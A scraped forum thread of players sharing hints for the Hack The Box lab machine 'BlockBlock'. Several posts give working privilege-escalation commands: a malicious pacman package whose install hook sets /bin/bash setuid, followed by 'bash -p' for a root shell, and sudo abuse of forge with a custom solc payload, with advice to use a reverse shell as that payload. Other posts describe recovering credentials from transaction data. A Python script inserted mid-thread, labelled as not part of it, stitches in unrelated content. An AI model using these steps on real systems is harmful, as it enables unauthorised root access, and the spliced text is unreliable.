BLOCKBLOCK - HTB
by osamy7593 - Saturday November 16, 2024 at 07:12 PM
#61
(Nov 19, 2024, 06:29 PM)ritualist Wrote:
(Nov 19, 2024, 06:26 PM)gfttjdb Wrote:
(Nov 19, 2024, 06:01 PM)ritualist Wrote: For those still stuck on the last step and the lazy.
As somebody mentioned, you can use a post-install step

cd /dev/shm
echo -e "pkgname=exp\npkgver=1.0\npkgrel=1\narch=('any')\ninstall=exp.install" > PKGBUILD
echo "post_install() { chmod 4777 /bin/bash; }" > exp.install
makepkg -s
sudo pacman -U *.zst --noconfirm
bash -p


I have also noticed that for keira -> paul you can skip the init step and just use build.
Put a rev shell as your payload.
not working bro 
[keira@blockblock shm]$ sudo pacman -U *.zst --noconfirm
[sudo] password for keira:
Sorry, user keira is not allowed to execute '/usr/bin/pacman -U exp-1.0-1-any.pkg.tar.zst --noconfirm' as root on blockblock.

It's for paul -> root
See my previous post for getting from keira to paul.

Stop helping them, dude... don't you see it, they can't even do simple things... they're a bunch of script kiddies.
Reply
#62
Hi guys! I've been trying for days to decode the input I got from the first transaction in the first block to retrieve the user Keira from hash? or input? I've tried various online tools, converting hex to decimal, binary, ASCII, UTF-8, and even using a Node.js app that's supposed to handle this, but I haven't managed to make it work. I've tried this https://lab.miguelmota.com/ethereum-inpu...r/example/ but nothing. Any tips on how to retrieve the user Keira using the eth_getBlockByNumber method from Ethereum JSON-RPC?
Reply
#63
(Nov 19, 2024, 08:59 AM)test888 Wrote:
(Nov 18, 2024, 03:58 PM)ritualist Wrote: To escalate to paul:

Init a new project
sudo -u paul /home/paul/.foundry/bin/forge init /dev/shm/exploit --no-git --offline

Put your payload in e.g. /dev/shm/solc

In `/dev/shm/exploit`, build with a custom solc
sudo -u paul /home/paul/.foundry/bin/forge build --use ../solc

Last step is using pacman.

Do you create solc as the keira user? Because if so, paul cannot access it. Something's missing here.

Yes, as keira, and make it rx for everyone
Reply
#64
(Nov 20, 2024, 01:58 AM)grisun0 Wrote: Hi guys! I've been trying for days to decode the input I got from the first transaction in the first block to retrieve the user Keira from hash? or input? I've tried various online tools, converting hex to decimal, binary, ASCII, UTF-8, and even using a Node.js app that's supposed to handle this, but I haven't managed to make it work. I've tried this https://lab.miguelmota.com/ethereum-inpu...r/example/ but nothing. Any tips on how to retrieve the user Keira using the eth_getBlockByNumber method from Ethereum JSON-RPC?

Because it's not a usual input like the one in the 2nd contract, but the opcodes for the EVM. I was also stuck here for quite some time, and it turns out that even if you decode all the opcodes for the outcome, we need to make some guesses at the password. This should indeed be an insane level for getting user.
Reply
#65
(Nov 20, 2024, 08:29 AM)Axura Wrote:
(Nov 20, 2024, 01:58 AM)grisun0 Wrote: Hi guys! I've been trying for days to decode the input I got from the first transaction in the first block to retrieve the user Keira from hash? or input? I've tried various online tools, converting hex to decimal, binary, ASCII, UTF-8, and even using a Node.js app that's supposed to handle this, but I haven't managed to make it work. I've tried this https://lab.miguelmota.com/ethereum-inpu...r/example/ but nothing. Any tips on how to retrieve the user Keira using the eth_getBlockByNumber method from Ethereum JSON-RPC?

Because it's not a usual input like the one in the 2nd contract, but the opcodes for the EVM. I was also stuck here for quite some time, and it turns out that even if you decode all the opcodes for the outcome, we need to make some guesses at the password. This should indeed be an insane level for getting user.

Just decode the blob from hex in Cyberchef and you will find the username and password at the end of the output
Reply
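The hex decoding mentioned in the post above, as an added example that is not part of the original thread: transaction input is readable by anyone who can query the node, so the same decode works as a pre-deployment check for printable strings left in contract creation data. The function names and the sample input (a Solidity-style preamble followed by two ABI-encoded strings) are constructed for illustration.

```python
import re


def printable_runs(tx_input, min_len=6):
    """Return [(byte_offset, text)] for printable-ASCII runs in hex tx input."""
    hexstr = tx_input[2:] if tx_input[:2].lower() == "0x" else tx_input
    if len(hexstr) % 2:
        raise ValueError("odd-length hex string")
    raw = bytes.fromhex(hexstr)  # raises ValueError on non-hex characters
    # Runs of bytes in the printable ASCII range, at least min_len long.
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [(m.start(), m.group().decode("ascii")) for m in pattern.finditer(raw)]


def _word(n):
    # One 32-byte big-endian ABI word.
    return n.to_bytes(32, "big")


def _pad32(data):
    # Right-pad with zero bytes to a multiple of 32, as ABI string data is.
    return data + b"\x00" * (-len(data) % 32)


def build_sample_input():
    """Constructed sample: init-code preamble + ABI-encoded (string, string)."""
    preamble = bytes.fromhex("608060405234801561001057600080fd5b50")
    user, secret = b"example_user", b"Constructed-Pass1"  # constructed values
    args = (
        _word(0x40) + _word(0x40 + 32 + len(_pad32(user)))  # head: two offsets
        + _word(len(user)) + _pad32(user)                   # tail: first string
        + _word(len(secret)) + _pad32(secret)               # tail: second string
    )
    return "0x" + (preamble + args).hex()


if __name__ == "__main__":
    for offset, text in printable_runs(build_sample_input()):
        print(f"{offset:#06x}  {text}")
```

Any run this reports in deployment data is effectively published once the transaction is mined, so credentials found this way should be treated as exposed and rotated.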
#66
I think I have a new hatred for blockchain stuff after this box
Reply
#67
(Nov 20, 2024, 04:27 PM)iiNovaCore Wrote: I think I have a new hatred for blockchain stuff after this box

This is so true
Reply
#68
(Nov 20, 2024, 08:48 AM)a44857437 Wrote:
(Nov 20, 2024, 08:29 AM)Axura Wrote:
(Nov 20, 2024, 01:58 AM)grisun0 Wrote: Hi guys! I've been trying for days to decode the input I got from the first transaction in the first block to retrieve the user Keira from hash? or input? I've tried various online tools, converting hex to decimal, binary, ASCII, UTF-8, and even using a Node.js app that's supposed to handle this, but I haven't managed to make it work. I've tried this https://lab.miguelmota.com/ethereum-inpu...r/example/ but nothing. Any tips on how to retrieve the user Keira using the eth_getBlockByNumber method from Ethereum JSON-RPC?

Because it's not a usual input like the one in the 2nd contract, but the opcodes for the EVM. I was also stuck here for quite some time, and it turns out that even if you decode all the opcodes for the outcome, we need to make some guesses at the password. This should indeed be an insane level for getting user.

Just decode the blob from hex in Cyberchef and you will find the username and password at the end of the output

Thank you very much, you unblocked me, I was already very stuck.
Reply
#69
This box is a whole new level of "why isn't this working"
Reply
#70
When trying to interact I keep getting Error: 401 {"error":"Prox
Reply

